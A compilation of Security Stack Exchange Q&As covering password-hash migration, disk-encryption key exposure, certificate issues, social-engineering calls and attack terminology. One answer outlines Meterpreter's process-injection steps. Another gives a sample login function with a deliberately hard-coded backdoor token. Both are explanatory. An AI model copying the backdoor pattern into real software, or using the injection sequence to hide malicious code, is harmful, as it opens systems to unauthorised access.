LUKS do things that are important from a security standpoint. For example, suppose you fall asleep while authenticating with gmail and accidentally type in your drive password. In dm-crypt there is no way to change the password without re-encrypting your whole device (and doing so in-place is risky, since a system crash or power loss event will leave you with a guaranteed hosed system). With LUKS, you can change the password.
{ "source": [ "https://security.stackexchange.com/questions/90468", "https://security.stackexchange.com", "https://security.stackexchange.com/users/9804/" ] }
90,561
The software that our company builds just went through a security audit. The auditors flagged our use of MD5 for hashing passwords that users can set if they want a password on their files. Having looked into it, it seems that I should replace it with PBKDF2. But removing all MD5 hashing methods from the software will mean users temporarily lose all their passwords? As in, we will need to communicate to customers that if they update, all their files will no longer be password-protected? I mean, I can check that an old hash exists and force them to manually set a new password, but the password could be set by anyone, which seems like kind of a big flaw. If an attacker has access to their file and the new version of our software, they will get access to the file without a password.
This is a common problem. The usual answer is twofold: For users who haven't logged in since the change: use the old hash value as the input for the new hashing scheme. Whenever somebody logs in after the change: Use the new password directly as input for the new hashing scheme. Use an additional column in the new table to indicate how the new hash was calculated. Further reading Hash function change https://stackoverflow.com/questions/14399750/moving-old-passwords-to-new-hashing-algorithm https://stackoverflow.com/questions/8864239/how-to-migrate-passwords-to-a-different-hashing-method https://stackoverflow.com/questions/6469913/how-to-migrate-a-password-hash https://webmasters.stackexchange.com/questions/1062/migrate-user-accounts-out-of-system-with-hashed-passwords
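Here is a minimal sketch of that twofold approach, using PBKDF2 from the Python standard library as a stand-in for whatever slow hash you choose, and a hypothetical "algo" column to record how each row was produced:

```python
import hashlib, hmac, os

def pbkdf2(data: bytes, salt: bytes, iterations: int = 200_000) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", data, salt, iterations)

def upgrade_legacy_row(old_md5_hex: str) -> dict:
    """Step 1: wrap the existing MD5 digest in the new scheme, offline."""
    salt = os.urandom(16)
    return {"algo": "pbkdf2(md5)", "salt": salt, "hash": pbkdf2(old_md5_hex.encode(), salt)}

def verify(password: str, row: dict) -> bool:
    """Step 2: check a login against either scheme, and rehash on success."""
    if row["algo"] == "pbkdf2(md5)":
        md5_hex = hashlib.md5(password.encode()).hexdigest()
        candidate = pbkdf2(md5_hex.encode(), row["salt"])
    else:  # "pbkdf2"
        candidate = pbkdf2(password.encode(), row["salt"])
    ok = hmac.compare_digest(candidate, row["hash"])
    if ok and row["algo"] == "pbkdf2(md5)":
        salt = os.urandom(16)   # user just proved the password: upgrade the row
        row.update(algo="pbkdf2", salt=salt, hash=pbkdf2(password.encode(), salt))
    return ok
```

After the offline step no plain MD5 digests remain in the table, and each successful login quietly upgrades its row to the direct scheme.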
{ "source": [ "https://security.stackexchange.com/questions/90561", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77708/" ] }
90,578
Did anyone try to figure out how process migration works in Meterpreter in Windows? I want to make my own script to learn that, but am failing to find a starting point for that. Well, I have an idea to use NtQuerySystemInformation library and its SystemHandleInformation function, as it can return handle of a thread in the OS and using those I can change its parent, but I doubt that it's going to work (due to TEB). And I have a feeling that there should be an easier way than NtQuerySystemInformation . Could anyone suggest a DLL or an algorithm to use?
This is how migrate works in meterpreter: Get the PID the user wants to migrate into. This is the target process. Check whether the architecture of the target process is 32-bit or 64-bit. This is important for memory alignment. Check if the meterpreter process has the SeDebugPrivilege. This is used to get a handle to the target process. Further details at http://support.microsoft.com/kb/131065 Get the actual payload from the handler that is going to be injected into the target process. Calculate its length as well. Call the OpenProcess() API to gain access to the virtual memory of the target process. Call the VirtualAllocEx() API to allocate RWX (Read, Write, Execute) memory in the target process. Call the WriteProcessMemory() API to write the payload into the target process's virtual memory space. Call the CreateRemoteThread() API to execute the newly created memory stub containing the injected payload in a new thread. Shut down the previous thread running the initial meterpreter in the old process.
{ "source": [ "https://security.stackexchange.com/questions/90578", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77713/" ] }
90,697
Both my boot partition and my data partition are encrypted with TrueCrypt. My password is lengthy, so I find myself avoiding a reboot of my system whenever possible. When going to lunch (for instance), I have been putting my laptop into "Sleep" mode, which requires me to enter my Windows password to get back into Windows. (My Windows password is weak; more to keep the kids out of my account than anything else.) I'm aware of software that can remove Windows passwords easily, but I am not aware of a tool that can remove a password without rebooting. (If they reboot my machine, they will have to re-enter my TrueCrypt password.) How sophisticated would an adversary have to be to get data from my computer when it is only in "Sleep" mode?
For virtually all disk encryption tools, your encryption key will be stored in RAM while the computer is in use or in sleep mode. This of course presents a fairly significant vulnerability, because if someone can dump the contents of your RAM while keeping its contents intact, it is likely they can extract the key from the RAM dump using widely available commercial software such as Elcomsoft Forensic Disk Decryptor which claims to extract Truecrypt, Bitlocker, and PGP keys. To protect yourself against this, you'll have to make it harder for an attacker to obtain a RAM dump. The easiest way to obtain a RAM dump is by using software programs that come with many forensics toolkits (which are also freely available). However, the catch is that in order to run these programs, they would first have to unlock your computer. If they can't unlock your computer to run programs, they can't launch any RAM dump utilities. For this reason, having a strong Windows lock screen password is important! (Also, just to be realistic and state the obvious, the lock screen password is also important because if an attacker is able to guess it, they could just grab a copy of your files right then and there and not even worry about finding your encryption key. For a run-of-the-mill thief interested in obtaining your data, this would probably be the most realistic threat IMO) A more sophisticated way is to use a cold boot attack ; this takes advantage of the fact that contents of memory will remain there for some time (from a few seconds to a few hours if the RAM is cooled with a refrigerant) even after power is turned off. The attacker can then bypass Windows and boot into a RAM dump utility or physically move the RAM to a different machine for reading. This kind of attack significantly harder to protect against. Lastly I'd also mention that development of Truecrypt stopped a year ago for unknown reasons and it is no longer supported, so I would recommend moving to one of its forks such as Veracrypt .
{ "source": [ "https://security.stackexchange.com/questions/90697", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73051/" ] }
90,842
I have difficulties to pinpoint the difference between attack vector / attack surface / vulnerability and exploit. I think the difference between a vulnerability and an exploit is the following: A vulnerability is something that could get used to do harm (e.g. a buffer overflow), but does not necessarily mean that anything can be done. An exploit makes use of a vulnerability in a "productive" way (e.g. reading the following bytes in memory after triggering an error message). According to Wikipedia (vulnerability) To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface. So attack surface and vulnerability seem to be synonyms in the context of IT security (?) Could anybody please define the words or give examples for the difference between them?
All 4 terms are very different: Describes the Attack: Attack Vector : the 'route' by which an attack was carried out. SQLi is typically carried out using a browser client to the web application. The web application is the attack vector (possibly also the Internet, the client application, etc.; it depends on your focus). Exploit : the method of taking advantage of a vulnerability. The code used to send SQL commands to a web application in order to take advantage of the unsanitized user inputs is an 'exploit'. Describes the Target: Attack Surface : describes how exposed one is to attacks. Without a firewall to limit how many ports are blocked, then your 'attack surface' is all the ports. Blocking all ports but port 80 reduces your 'attack surface' to a single port. Vulnerability : a weakness that exposes risk. Unsantitized user inputs can pose a 'vulnerability' by a SQLi method. We can also look at this from the perspective of a user as the target. An attacker sends an infected PDF as an email attachment to a user. The user opens the PDF, gets infected, and malware is installed. The 'attack vector' was email, the 'exploit' was the code in the PDF, the 'vulnerability' is the weakness in the PDF viewer that allowed for code execution, the 'attack surface' is the user and email system.
{ "source": [ "https://security.stackexchange.com/questions/90842", "https://security.stackexchange.com", "https://security.stackexchange.com/users/3286/" ] }
90,848
I want to encrypt data using AES in Java, and I want to initialize the cipher with an initialisation vector. Can I use a 256-bit IV? Or must I use only a 128-bit IV?
The IV depends on the mode of operation . For most modes (e.g. CBC), the IV must have the same length as the block . AES uses 128-bit blocks, so a 128-bit IV. Note that AES-256 uses a 256-bit key (hence the name), but still with 128-bit blocks. AES was chosen as a subset of the family of block ciphers known as Rijndael . That family includes no less than 15 variants, for three possible block sizes (128, 192 and 256 bits) and five possible key sizes (128, 160, 192, 224 and 256 bits). AES , as standardized by NIST, includes only three variants, all with 128-bit blocks, and with keys of 128, 192 or 256 bits. To further confuse things, some software frameworks got it wrong; e.g. PHP uses "MCRYPT_RIJNDAEL_128" to designate Rijndael with 128-bit keys and 128-bit blocks (i.e. the same thing as AES-128), and "MCRYPT_RIJNDAEL_256" for Rijndael with 256-bit keys and 256-bit blocks (i.e. not one of the AES variants, and in particular not at all AES-256).
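The question was about Java, but the constraint is the same in any library: the IV length follows the 128-bit block, not the key size, so AES-256 in CBC mode still takes a 16-byte IV (in Java that would be a 16-byte IvParameterSpec). A quick sketch with the Python cryptography package, purely as an illustration:

```python
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding

key = os.urandom(32)   # AES-256: 256-bit key...
iv  = os.urandom(16)   # ...but still a 128-bit IV, because the block size is 128 bits

padder = padding.PKCS7(128).padder()
plaintext = padder.update(b"attack at dawn") + padder.finalize()

enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
ciphertext = enc.update(plaintext) + enc.finalize()

dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
unpadder = padding.PKCS7(128).unpadder()
print(unpadder.update(dec.update(ciphertext) + dec.finalize()) + unpadder.finalize())
```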
{ "source": [ "https://security.stackexchange.com/questions/90848", "https://security.stackexchange.com", "https://security.stackexchange.com/users/75958/" ] }
90,901
I was using Facebook today and, after replying politely to someone about how stupid his comment on something was, Mr. John Doe, who I never met before, sent me this message: You wanna get hacked, huh? In less than 3 minutes I was able to get your dynamic IP, PPPoE and mask (your machine is pretty vulnerable). But stay calm and call your computer technician. Best wishes Can he hack my Facebook account just with that? I think he was bluffing or something. If it helps, I am using a regular DSL wireless router, a desktop computer with a USB Wi-Fi receiver and the machine has Windows 7. By the way, I changed the router administration password as soon as I got the wireless router, months before this happened.
Your IP is a public address and has nothing to do with your Facebook account. Just knowing it does not help someone to 'hack' you. In the same way, knowing your IP does not increase your threat of your computer being hacked. He's blustering.
{ "source": [ "https://security.stackexchange.com/questions/90901", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77984/" ] }
90,972
On the advantages side, I see several benefits to using the Let's Encrypt service (e.g., the service is free, easy to setup, and easy to maintain). I'm wondering what, if any, are the disadvantages to using Let's Encrypt? Any reasons why website operators -- whether big like Twitter or small like a local photographer -- should not consider replacing their existing SSL services with companies like GoDaddy with this service? (If the service is not yet available, this disadvantage can be ignored -- I'm more wondering about disadvantages once it is available for general public use.)
Let's Encrypt is a Certificate Authority, and they have more or less the same privileges and power of any other existing (and larger) certificate authority in the market. As of today, the main objective downside of using a Let's Encrypt certificate is compatibility. This is an issue that any new CA faces when approaching the market. In order for a certificate to be trusted, it must be signed by a certificate that belongs to a trusted CA. In order to be trusted, a CA must have the signing certificate bundled in the browser/OS. A CA that enters the market today, assuming they are approved to the root certificate program of each browser/OS from day 0 (which is impossible), will be included in the current releases of the various browser/OS. However, they won't be able to be included in older (and already released) versions. In other words, if a CA Foo joins the root program on Day 0 when the Google Chrome version is 48 and Max OSX is 10.7, the Foo CA will not be included (and trusted) in any version of Chrome prior to 48 or Mac OSX prior to 10.7. You can't retroactively trust a CA. To limit the compatibility issue, Let's Encrypt got their root certificate cross-signed by another older CA (IdenTrust). This means a client that doesn't include LE root certificate can still fallback to IdenTrust and the certificate will be trusted... in an ideal world. In fact, it looks like there are various cases where this is not currently happening (Java, Windows XP, iTunes and other environments ). Therefore, that's the major downside of using a Let's Encrypt certificate: a reduced compatibility compared to other older competitors. Besides compatibility, other possible downsides are essentially related to the issuance policy of Let's Encrypt and their business decisions. Like any other service, they may not offer some features you need. Here's some notable differences of Let's Encrypt compared to other CAs ( I also wrote an article about them ): LE doesn't currently issue wildcard certificates (they will begin issuing wildcard certificates on Jan 2018 ) LE is now issuing wildcard certificates using the updated ACMEv2 protocol LE certificates have an expiration of 90 days LE only issues domain- or DNS-validated certificates (they don't plan to issue OV or EV, hence they only validate ownership and not the entity requesting the certificate) Current very-restrictive rate limiting † (they will continue to relax the limit while getting closer to the end of the beta) The points above are not necessarily downsides. However, they are business decisions that may not meet your specific requirements, and in that case they will represent downsides compared to other alternatives. † the main rate limit is 20 certs per registered domain per week. However this does not restrict the number of renewals you can issue each week.
{ "source": [ "https://security.stackexchange.com/questions/90972", "https://security.stackexchange.com", "https://security.stackexchange.com/users/18591/" ] }
91,006
I am not asking why hashing should be done. Instead, I want to know how to prevent developers from recording user passwords and using them to hack their users' other accounts, especially their email. Couldn't they store their users' passwords in plaintext without the users knowing? Is there any way for a user to detect/prevent this?
Of course they could, but then they could also just email themselves every time you change your password. Now, depending on the type of system, there are plenty of regulations, audits, reviews, and processes that might be relevant to ensure that the developers don't do this, or many other types of malicious activity. However, you, as a consumer, usually do not have much insight into any of this - except for when it goes wrong, for example if they email you your original password when you ask to reset it. But you're asking the wrong question here. Yes, it is important that whatever systems you use are developed securely, but that will never remove the element of implicit trust you will always have in the system itself - and, in this context, the developers are equivalent to the system itself. The real question you should be asking - and indeed you seem to be implying this - is how to protect your other accounts, on other systems, from a malicious developer or system . The answer is simple, really - use a different password for each system. Allow me to repeat that, for emphasis: NEVER REUSE PASSWORDS ON DIFFERENT SYSTEMS. Create a unique (strong, random, etc) password for each site, and never ever enter your password for SiteA on to SiteB. Because as you intuitively noted, if SiteB has your password for SiteA in any form, then that password is no longer secure from SiteB. Just for funsies, here is an xkcd on this : One last note, if you're starting to worry "How in heck am I going to remember a strong password independently for each different site??!!?" - take a look at this question here on passphrases , and also look into password managers (e.g. Password Safe, Keepass, LastPass, 1Pass, etc).
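If you go the password-manager route, the per-site secrets it generates are just long random strings. A minimal sketch of the idea, illustrative only; in practice let the manager generate and store these for you, and note that some sites reject certain punctuation:

```python
import secrets, string

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def random_password(length: int = 24) -> str:
    """One unique, high-entropy password per site."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def random_passphrase(wordlist, words: int = 6) -> str:
    """Diceware-style passphrase; wordlist is any large list of common words."""
    return " ".join(secrets.choice(wordlist) for _ in range(words))

print(random_password())
```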
{ "source": [ "https://security.stackexchange.com/questions/91006", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78094/" ] }
91,042
The answers to this question , and the associated xkcd got me wondering: if I use different account names in every service, then can I use the same hard-to-crack password in each? I'm thinking that cross-site password hacking, a-la-xkcd, is done by a machine, not a person. So it's easy to have usernames/emails that are site dependent (for example, all email addressed to @gregories.net comes to me, so I can have [email protected] as the email for my bank). That's a lot easier to remember than a bunch of secure passwords, but if the bank gets hacked, [email protected] is not going to work anywhere else. What's the problem with this?
Big data analysis means that your different usernames probably aren't as disassociated from one another as you think they are. In other words, they are likely all identifiable as yours. But perhaps the bigger issue is that if your password is compromised in one attack, then it becomes part of a password database the attackers can use against other password databases. Regardless of your usernames, they'll still (potentially) compromise your other accounts just by virtue of already having your common password in their database. More recent attack vectors use heuristic techniques more, and things like rainbow tables less, but still consider that if a heuristic approach has broken your password (and the lessons learned have been fed back into the password cracking algorithms), then it's going to break the same password everywhere you've used it. You're still better off using unique passwords for each service, IMO.
{ "source": [ "https://security.stackexchange.com/questions/91042", "https://security.stackexchange.com", "https://security.stackexchange.com/users/55509/" ] }
91,266
I always hear about backdoors and I understand their main purpose, but I have some questions: In what kind of software/web application/OS can I find them? How can I recognize one? How do I prevent them? Is it a good analogy to compare them to having root access (in the Linux sense)? Any other relevant information about them is welcome.
In what kind of software/web application/OS can I find them? Literally anything. How can I recognize one? By reverse engineering the software and carefully analysing it for flaws in authentication and access control, as well as issues with memory access in native applications. It's the same process by which you'd find any other vulnerability. This is not a trivial task, and entire books have been written on the subject. If you're looking to know the difference between a generic security vulnerability and a backdoor, the difference is the intent of the programmer who put it there. You have to find evidence and use intuition to identify whether it was purposeful or not. Usually this is not a yes/no answer. How do I prevent them? You basically can't. You just have to expect software to be broken and have a plan to (a) keep things up to date, and (b) deal with it should there be a breach. It's not about if, it's about when. Is it a good analogy to compare them to having root access? Not exactly. A backdoor is anything that allows a lesser-authorised user to gain access to something they shouldn't. The backdoor might allow full access to an unauthenticated user, or it might allow some limited access to an unauthenticated user, or it might allow an authenticated low-privilege user to gain access to something at a higher privilege level. Any other relevant information about them? There isn't much, really. Backdoors are just intentional faults put into code to give someone access outside of the normal security model.
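To make the "intentional fault" idea concrete, here is a deliberately obvious, entirely hypothetical sketch of what a backdoor can look like in an authentication routine (real backdoors are usually far better hidden -- buried in parsers, disguised as off-by-one bugs, and so on; every name below is invented for this example):

```python
import hashlib
import hmac

# Hypothetical login check with a hard-coded "maintenance" credential.
# The extra branch is the backdoor: anyone who knows the magic value
# bypasses normal authentication entirely.
BACKDOOR_TOKEN = "debug-override-2003"   # invented for this example

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def is_authenticated(password: str, salt: bytes, stored_hash: bytes) -> bool:
    if password == BACKDOOR_TOKEN:                      # <-- the backdoor
        return True
    return hmac.compare_digest(hash_password(password, salt), stored_hash)
```

When reverse engineering, this is the kind of branch you hunt for in authentication and access-control paths: code that grants access based on something other than the legitimate credential.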
{ "source": [ "https://security.stackexchange.com/questions/91266", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78043/" ] }
91,292
I stumbled across a huge security vulnerability in a Certificate Authority that is trusted by all modern browsers and computers. Specifically, I am able to get a valid signed certificate for a domain I don't own. If I had the means to become a Man In The Middle, I would be able to present a perfectly valid SSL certificate. This vulnerability required no SQL injections or coding on my part. I quite figuratively stumbled across it. What is the proper way to report this? I want to be ethical and report it to the offending CA, but I also don't want them to simply fix the vulnerability and then sweep everything under the rug. This problem seems to have been there a while, and I'm simply not smart enough to be the only one capable of finding it. I'm concerned that solely contacting the CA will result in a panic on their part, and they, fearing a DigiNotar-like incident, will do anything to keep the public from finding out. Am I allowed to also contact some major players, such as other certificate authorities or other sites such as CloudFlare or Google? (I know CloudFlare was given a heads-up about HeartBleed before the public announcement went out.) Note: I'm posting under a pseudonym account to (try to) remain anonymous for now. Edit: This question is related to another question, but I feel this vulnerability falls outside the scope of that question. This could affect essentially the entire internet (i.e. everyone online is a customer), and my question explicitly states that simply contacting the 'developer' (the accepted answer for the linked question) doesn't seem like the best first step to me. Edit 2: I've gotten in contact with some people, and they've advised me to avoid talking further on this forum (sorry guys!). I'll update this question later, after the vulnerability has been fully fixed and any incorrect certificates revoked. Edit 3: The details are out. I've posted more information on my personal site about the specifics of the vulnerability. The story is still ongoing, and you can read the discussion between Mozilla, Google, and the CA WoSign. Edit 4: As promised, I'm updating with a link to an article written by Ars Technica regarding this and other incidents involving WoSign. Looks like WoSign and StartCom (now owned by the same company) may be in serious danger of root revocation.
Such a claim is generally quite serious. While reaching out to the vendor in question is a responsible matter, you should certainly consider notifying the relevant root store security teams, since they are responsible for designing, evaluating, and applying the security controls to prevent this, and will likely need to directly work with the CA to ascertain the issues. In terms of responsible disclosure you should also immediately report this to each of the major root store operators: Google, Microsoft, Apple, Mozilla. Just search for " <vendor> report security bug", and the first result will tell you. These are just some of the vendors affected - e.g. not just the CA. If you are unsure about how to do this, wish to remain anonymous, or need assistance coordinating, the Chromium security team is happy to investigate, contact the appropriate CA, and coordinate with the broader industry. See https://www.chromium.org/Home/chromium-security/reporting-security-bugs for details.
{ "source": [ "https://security.stackexchange.com/questions/91292", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78318/" ] }
91,350
On almost any website that relates information about cryptography in general there is this common notion that almost all encryption/decryption algorithms should use a key as one of their inputs. The reason behind this is that encryption algorithms that don't use a key are technically useless. Because of this I cannot help but wonder how they came to that conclusion. Why is it that the common trend in cryptography is to keep the security key a secret but allow the encryption and decryption algorithms to be public. What if both the encryption and decryption algorithms were the secret? In that case there would be no need for a key anymore and it would simplify things a great deal. For example: suppose I am a software developer that wants to send textual messages from one computer to another (and back) to allow communication (a simple chat app). Suppose the computers are communicating with each other over an insecure network with the TCP/IP protocol. Suppose that I want to ensure their conversation some privacy and come up with this very basic "encryption" algorithm in which I simply add 10 to each ASCII code for each letter in the plaintext before sending it as raw bytes over the network. As such a message such as "Hello, brother!" would be intercepted by any attacker as "Rovvy6*l|y~ro|+". How can anyone intercepting the message reconstruct the original plaintext if they had no knowledge of either the encryption or decryption algorithms? What would be the best approach to breaking this cryptosystem? Is it really that easy to somehow break encryption schemes that don't use keys, that they are not viable solutions? Finally, if you want to say something like "Well....you don't need a genius to figure out that you're just adding 10 to each byte of the plaintext", I did that for simplicity's sake. If you want to make the message even more cryptic then feel free to imagine the mathematical formula being a lot more complex (such as adding 7 then subtracting 10 and then multiplying by 2).
We don't just want secrecy. We want quantifiable secrecy. The point is not only to ensure confidentiality of data, but also to be able to know that we indeed ensured confidentiality of data. When we have a public algorithm and a secret key, secrecy can be quantified. For instance, if we use AES with a 128-bit key, then we know that an attacker will have to try an average of 2^127 possible keys (i.e. way too many to actually do it) to find the right one. If instead we tried to use a secret algorithm, then we would face three big challenges: As @Xander explains, making a secure encryption algorithm is awfully hard. The only known method which offers some decent reliability is public design: publish the algorithm, let loose hundreds of cryptographers on it, and see if they can find something wrong in it. If, after a couple of years, none of them found anything bad in the algorithm, then it is probably not too weak. With a secret algorithm, you have to do all that cross-review work yourself, which is not feasible in any decent amount of time. We do not know how many "decent encryption algorithms" can exist. An attacker may try to enumerate the possible algorithms, where "possible" means "that which the designer may have come up with". Part of the issue is in the realm of psychology, so quantification will be hard. A secret algorithm still exists as source code on some computer, compiled binaries on some others, and in the head of at least one designer. Unless all the involved development computers and the designer's corpse were dissolved in a big acid cauldron, it is very hard to prevent that "secret algorithm" from leaking everywhere. On the other hand, a secret key is a small element that can be more efficiently managed and kept secret (stored in RAM only, possibly rebuilt from a key exchange algorithm like Diffie-Hellman...). Since the algorithm will probably leak, you may as well consider it public and rely only on the secrecy of the key. By actually making the algorithm public, you may then benefit from extended review by other people, which is an almost unavoidable precondition for achieving security.
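To illustrate the second point with the scheme from the question: a fixed shift of every byte has no key, so the only "secret" is the algorithm itself, and the whole family of such algorithms can be enumerated in a 256-iteration loop. A quick sketch (the ciphertext is the one from the question):

```python
ciphertext = "Rovvy6*l|y~ro|+"   # "Hello, brother!" with +10 added to each byte

# Try every possible fixed shift; keep only candidates that are printable ASCII.
for shift in range(256):
    candidate = "".join(chr((ord(c) - shift) % 256) for c in ciphertext)
    if all(32 <= ord(ch) < 127 for ch in candidate):
        print(shift, repr(candidate))
```

Only a handful of shifts survive the printable-text filter, and a human glancing at them spots the plaintext immediately -- which is exactly why the secrecy of such a scheme cannot be quantified the way a 128-bit key can.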
{ "source": [ "https://security.stackexchange.com/questions/91350", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78355/" ] }
91,446
Firefox dev tools show that https://www.google.com is using a certificate signed with SHA-1. Why is Google doing this when they are phasing out the certificate themselves? Shouldn't this only hurt Google's reputation and interests?
This may be a case of "do what I say, not what I do". Note that Chrome complains about use of SHA-1 for signing certificates whose validity extends beyond the end of year 2015. In this case, Google's certificate is short-lived (right now, the certificate they use was issued on June 3rd, 2015, and will expire on August 31st, 2015) and thus evades Chrome's vengeful anathema on SHA-1. Using short-lived certificates is a good idea, because it allows for a lot of flexibility. For instance, Google can get away with using SHA-1 (despite Chrome's rigorous stance) because the algorithms used to guarantee the integrity of a certificate do not need to be robust beyond the certificate expiration; thus, they can use SHA-1 for certificates that live for three months as long as they believe that they will get at least a three-month prior notice when browsers decide that SHA-1 is definitely and definitively a tool of the Demon, to be shot on sight. My guess as to why they still use SHA-1 is that they want to interoperate with some existing systems and browsers that do not support SHA-256 yet. Apart from pre-SP3 Windows XP systems (which should be taken off the Internet ASAP), one may expect that there still linger a number of existing firewalls and other intrusion detection systems that have trouble with SHA-256. By using a SHA-256-powered certificate, Google would incur the risk of making their site "broken" for some customers -- through no fault of Google's, but customers are not always fair in their imprecations. So Google's strategy would appear to be the following: They configure Chrome to scream and wail when it sees a SHA-1 certificate that extends into 2016 or later. Because of all the scary warnings, users of existing SSL servers (not Google's) begin to desert (e.g. they don't complete their online banking transactions, because they are afraid), forcing the server administrators to buy SHA-256 certificates. Now these new certificates "break" these sites in the eyes of the poor people that must live with outdated browsers or firewalls. This ought to force people to upgrade these browsers and firewalls. Meanwhile, Google's reputation is unscathed, because their site never triggered any warning or broke an old firewall -- since it still uses SHA-1! When the whole world has switched to SHA-256, and all firewalls have been updated, the path becomes clear for Google, and they can use SHA-256 for their new certificates. It is a pretty smart (and somewhat evil) strategy, if they can pull it off (and, Google being Google, I believe they can).
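If you want to check a site's certificate yourself, the signature hash and the validity window are easy to read programmatically -- for instance with Python's ssl module plus the third-party cryptography package (a sketch; the values printed will obviously reflect whatever certificate the site serves on the day you run it):

```python
import socket
import ssl

from cryptography import x509

hostname = "www.google.com"

ctx = ssl.create_default_context()
with socket.create_connection((hostname, 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
        der_cert = tls.getpeercert(binary_form=True)

cert = x509.load_der_x509_certificate(der_cert)
print("Signature hash:", cert.signature_hash_algorithm.name)   # e.g. sha1 or sha256
print("Valid from: ", cert.not_valid_before)
print("Valid until:", cert.not_valid_after)
```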
{ "source": [ "https://security.stackexchange.com/questions/91446", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78439/" ] }
91,476
In the Atlantic article " Hacked! " it says: My wife’s password was judged as “strong” when she first chose it for use with Gmail. But it was a combination of two short English words followed by numbers, so if it didn’t leak from some other site, it might just have been guessed in a brute-force attack. For reasons too complex to explain here, even some systems, like Gmail’s, that don’t allow intruders to make millions of random guesses at a password can still be vulnerable to brute-force attacks. What vulnerability is the author referring to?
For starters, that article misuses terminology. Whatever vulnerability they may be referring to, it seems pretty blatant that it is not "brute force", as that would contradict the premise of that very sentence. As another answer suggested, it's possible that some form of social engineering was employed, but in this case any rounds of "guessing" left would not be brute force at all but would be cleverly leveraging known data points. Additionally, it misidentifies the most likely security failure. Altogether more likely in the case described in the article is a compromised database on another site. The article specifically allows for this when it says "if it didn’t leak from some other site", implying that his wife does not use unique passwords per site. If you don't use unique passwords [1] then all bets are off [2] and you cannot blame Google if your Gmail account is compromised [3]; all your stuff is only as safe as the weakest site you use—a least-common-denominator approach that is bound to get you into trouble, as for any given set of sites it is almost guaranteed that one of them has mishandled user data! [1] You should. Full stop. [2] In addition to (but not in place of) using unique passwords, enabling two-factor authentication would also mitigate against this attack vector. [3] Note again the terminology issue here. A compromised account (as in my usage) is different than a hacked account (as in the article's usage). In the most likely scenario the Gmail account was not hacked—no security measure at Google failed—the attacker was merely able to log in with the password they hacked from somewhere else.
{ "source": [ "https://security.stackexchange.com/questions/91476", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77025/" ] }
91,641
The chief security officer of a medium sized IT company (400-500 employees) recently released a bulletin in which he stated that DDOS attacks are not a security risk but an operational one. Also I was told that in a previous meeting he denied that DDOS or related attacks are his responsibility. From my understanding security comprises three major themes: Confidentiality, Integrity, Availability In my opinion DDOS attacks are clearly a security risk as they directly target availability of a service - and thus are also clearly within the responsibilities of a chief security officer. So who is right? Are DDOS attacks a security or operational risk?
I think that is a false dichotomy, and your CSO is being plain silly. Though I am fond of the silliness, the security department should be driving risk mitigation. Squabbling over areas of "responsibility" is obviously not productive, though it might fit into the general corporate culture. While there are various ways of qualifying the realm of security and their responsibility - the CIA triad is one, but there are others - a mature, responsible CSO would at the least be pushing for a solution. I have heard some say that the distinction between "security risk" and "operational risk" is whether there is a potential threat actor, or merely accident or misuse. While this does make a lot of sense, I think a more pragmatic approach would be to simply accept that there is substantial overlap between the two - and that just means there are more resources to work on the problem, not that everybody gets to abdicate responsibility. That said - in this specific case, the process I would recommend is having the CSO (or technical people in his department) drive the mitigation procedure, define a framework for levels of risk, etc. - and then hand it off to operations to implement a fitting solution. Perhaps the security folk can recommend a solution, or maybe they should just define metrics that the solution should meet, depending on how technical / hands-on the team is. In this way, the company can handle the fact that while the risk is a security risk, the solution is an operational one.
{ "source": [ "https://security.stackexchange.com/questions/91641", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16145/" ] }
91,681
My bank called me the other day, and the person who spoke to me failed to give me a single piece of evidence that he was calling from my bank. The bank's number was hidden, just like with many other companies, maybe because they use VoIP to make calls or because they don't want you to ring them back on the number they call you from. The person I spoke to refused my proposal for mutual verification of our identities when I asked him to tell me my account number, since all the information he appeared to know about me was my name and phone number, which are available to the public.
If you're worried about the authenticity of a cold-call, don't try over-the-phone authentication in either direction. Simply ask for some basic information you can use to refer to the issue in follow-up: Name of the company/service the account is for. What is the nature of the issue/offer the caller wants to discuss? Is there a reference ID (e.g.: ticket #) for the call? Name and/or agent ID of the caller. Important: Throughout this process, you should not ever give the caller any more of your information. The main point here is to assume that someone calling you like this is an attacker, for the entire duration of the initial call. Question #1 should be answered by the caller before you even have to ask. Be especially wary if it's not. My wife once argued for a good couple of minutes with someone calling from the "Account Services Department", before she finally handed the phone to me. When I interrupted the caller to ask "Account Services Department for whom?" the caller suddenly hung up. After you've gotten all you can from the caller, hang up. Then, obtain legitimate contact information for the company from a reliable source (do not use any contact info given by the caller, without verifying it first). Once you've got known-good contact information, call the company yourself and ask about your account's status. Use information obtained from the caller as needed, to reference the incident.
{ "source": [ "https://security.stackexchange.com/questions/91681", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
91,699
